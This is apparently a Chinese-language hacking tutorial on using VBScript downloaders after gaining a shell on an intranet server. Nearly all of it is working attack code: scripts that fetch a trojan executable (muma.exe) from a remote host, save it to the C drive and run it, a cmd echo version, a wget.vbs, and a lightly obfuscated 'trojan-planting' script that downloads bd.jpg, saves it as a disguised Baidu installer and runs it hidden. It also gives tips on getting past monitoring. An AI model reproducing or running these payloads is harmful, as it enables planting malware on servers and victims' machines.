当拿到shell到手,服务器是内网,你又没有条件映射,服务器又穿不上东西
是不是很郁闷,还有我们还有vbs,能执行cmd命令就有希望
一、VBS下载者:
复制代码 代码如下:
Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","http://www.jbzj.com/muma.exe",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "c:zl.exe",2
wscript.sleep 1000
Shell.Run ("c:zl.exe") '延迟过后执行下载文件
二、cmd下执行的版本:
复制代码 代码如下:
echo Set Post = CreateObject("Msxml2.XMLHTTP") >>zl.vbs
echo Set Shell = CreateObject("Wscript.Shell") >>zl.vbs
echo Post.Open "GET","http://www.jbzj.com/muma.exe",0 >>zl.vbs
echo Post.Send() >>zl.vbs
echo Set aGet = CreateObject("ADODB.Stream") >>zl.vbs
echo aGet.Mode = 3 >>zl.vbs
echo aGet.Type = 1 >>zl.vbs
echo aGet.Open() >>zl.vbs
echo aGet.Write(Post.responseBody) >>zl.vbs
echo aGet.SaveToFile "c:zl.exe",2 >>zl.vbs
echo wscript.sleep 1000 >>zl.vbs
echo Shell.Run ("c:zl.exe") >>zl.vbs
三、wget.vbs
复制代码 代码如下:
on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
set xPost=CreateObject("Microsoft.XMLHTTP")
if iUser="" and iPass="" then
xPost.Open "GET",iRemote,0
else
xPost.Open "GET",iRemote,0,iUser,iPass
end if
xPost.Send()
set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile iLocal,2
使用方法:cscript wget.vbs http://www.jbzj.com/muma.exe
第一种是普通下载者,可能会被监控到,反正是我用它下载exe,每次都执行超时估计是被拦截了,但是它代码短小,能旋转~~,你可以用他下载其他的VBS
列如 VBS传马病毒
on error resume next iLocal=LCase(Wscript.Arguments(1)) iRemote=LCase(Wscript.Arguments(0)) iUser=LCase(Wscript.Arguments(2)) iPass=LCase(Wscript.Arguments(3)) set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP") if iUser="" and iPass="" then xPost.Open "GET","http://www.dqsfjd.cn/bd.jpg",0 else xPost.Open "GET",iRemote,0,iUser,iPass end if xPost.Send() set sGet=CreateObject("ADODB.Stream") sGet.Mode=3 sGet.Type=1 sGet.Open() sGet.Write xPost.ResponseBody sGet.SaveToFile "C:Baidusd_OnlineSetup_sid_30084_silent.exe",2 Set objShell = CreateObject("Wscript.Shell") objShell.Run "C:Baidusd_OnlineSetup_sid_30084_silent.exe", 0 Wscript.Sleep 1000 on error resume next iLocal=LCase(Wscript.Arguments(1)) iRemote=LCase(Wscript.Arguments(0)) iUser=LCase(Wscript.Arguments(2)) iPass=LCase(Wscript.Arguments(3)) set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP") |
这段代码是将bd.jpg下载并保存为C:Baidusd_OnlineSetup_sid_30084_silent.exe,然后执行
使用方法 cscript c:xia.vbs
此段代码执行成功率高,
实验证明VBS传马病毒,CMD命令echo保存时不行的,所以就要用到。vbs下载者把VBS传马病毒下载到服务器上